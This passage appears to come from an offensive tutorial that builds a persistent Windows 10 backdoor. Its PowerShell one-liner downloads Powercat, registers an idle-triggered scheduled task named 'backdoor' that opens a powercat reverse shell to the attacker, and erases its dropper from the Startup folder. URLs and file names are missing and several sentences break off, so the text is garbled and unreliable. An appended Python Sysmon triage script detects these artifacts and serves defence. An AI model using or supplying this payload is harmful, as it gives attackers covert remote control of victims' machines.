The PowerShell script () will embed a persistent backdoor with the schtasks command and remove evidence of itself from the Startup directory. This is only one example of a PowerShell payload. The script can execute a wide range of automated attacks, such as sensitive file exfiltration, desktop live-streaming, password dumping, and converting the device into a web
There are several lines in the below PowerShell payload. Comments have been added to help explain what each line does.
# A new directory is created called “Windows” in an attempt to
# hide a malicious script in plain sight.
# Invoke-WebRequest is used to download Powercat, a Netcat-like
# PowerShell module. The Powercat script is saved in the
# new “Windows” directory.
iwr ” -O C:\Users\$env:username\Windows\1
# The schtasks command is executed to create a new scheduled task
# called “backdoor.” The task will import the Powercat script
# and attempt to create a TCP connection to the attacker’s system
# every time the Windows 10 computer becomes idle.
schtasks /create /f /tn backdoor /tr ‘powershell /w 1 -ep bypass /C ipmo C:\Users\$env:username\Windows\1;powercat -c -p 9999 -e powershell’ /sc onidle /i 1
# The is removed from the Startup directory.
rm C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\
Create a directory called “torrent” with the mkdir command.
~# mkdir torrent/
Change into the new directory.
~# cd torrent/
~/torrent#
The above payload has been condensed into one line, chained together by semicolons, which will allow Windows 10 to cleanly execute all of the desired code as one
Use nano to create a new “” file:
~/torrent# nano
And save the below PowerShell script to the file:
powershell -ep bypass /w 1 “& mkdir C:\Users\$env:username\Windows;iwr ” -O C:\Users\$env:username\Windows\1;schtasks /create /f /tn backdoor /tr ‘powershell /w 1 -ep bypass /C ipmo C:\Users\$env:username\Windows\1;powercat -c -p 9999 -e powershell’ /sc onidle /i 1;rm C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\”
Notice the grave accent (`) in the “Start` Menu” file path. This is not a typo. The grave accent character is a solution to escape
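On the defensive side, this step leaves two artifacts: a file written into the Startup directory by the torrent client, and a schtasks command that launches a hidden, policy-bypassing PowerShell on idle. The added example below (not part of the original article) triages Sysmon-style events (ID 1 process creation, ID 11 file creation) for both; the event records, user name, file names and the list of torrent client process names are constructed assumptions.

```python
import re

STARTUP = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+$", re.I)
RUNNABLE = re.compile(r"\.(exe|bat|cmd|ps1|vbs|js|hta|lnk)$", re.I)
TORRENT_CLIENTS = {"utorrent.exe", "bittorrent.exe", "qbittorrent.exe"}  # assumed list
SCHTASKS_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*[-/]create\b", re.I)
# PowerShell accepts abbreviated parameters and "/" or "-" prefixes, so match
# /w 1, -WindowStyle Hidden, -ep bypass and -ExecutionPolicy Bypass alike.
HIDDEN = re.compile(r"powershell.*[-/]w(in\w*)?\s+(1|hidden)\b", re.I)
BYPASS = re.compile(r"powershell.*[-/](ep|ex\w*)\s+bypass\b", re.I)
ON_IDLE = re.compile(r"[-/]sc\s+onidle\b", re.I)

def triage(event):
    """Return finding names for one Sysmon-style event (ID 1 or 11)."""
    findings = []
    if event["id"] == 11:                      # FileCreate
        target = event["TargetFilename"]
        if STARTUP.search(target):
            writer = event["Image"].rsplit("\\", 1)[-1].lower()
            if writer in TORRENT_CLIENTS:
                findings.append("startup-write-by-torrent-client")
            if RUNNABLE.search(target):
                findings.append("runnable-file-in-startup")
    elif event["id"] == 1:                     # ProcessCreate
        cmd = event["CommandLine"]
        if SCHTASKS_CREATE.search(cmd):
            if HIDDEN.search(cmd) or BYPASS.search(cmd):
                findings.append("task-runs-hidden-or-bypass-powershell")
            if ON_IDLE.search(cmd):
                findings.append("task-on-idle-trigger")
    return findings

# Constructed events; user name, paths and file names are placeholders.
EVENTS = [
    {"id": 11, "Image": r"C:\Users\alice\AppData\Roaming\uTorrent\uTorrent.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\sample.bat"},
    {"id": 11, "Image": r"C:\Users\alice\AppData\Roaming\uTorrent\uTorrent.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\debian.iso"},
    {"id": 1, "CommandLine": "schtasks /create /f /tn backdoor /tr "
     r"'powershell /w 1 -ep bypass /C ipmo C:\Users\alice\Windows\1' /sc onidle /i 1"},
    {"id": 1, "CommandLine": r'schtasks /create /tn Backup /tr "C:\Tools\backup.exe" /sc daily'},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev))
```

Because the script deletes itself from the Startup directory, the file-creation event and the scheduled task are the durable evidence; the Startup folder will look clean afterwards.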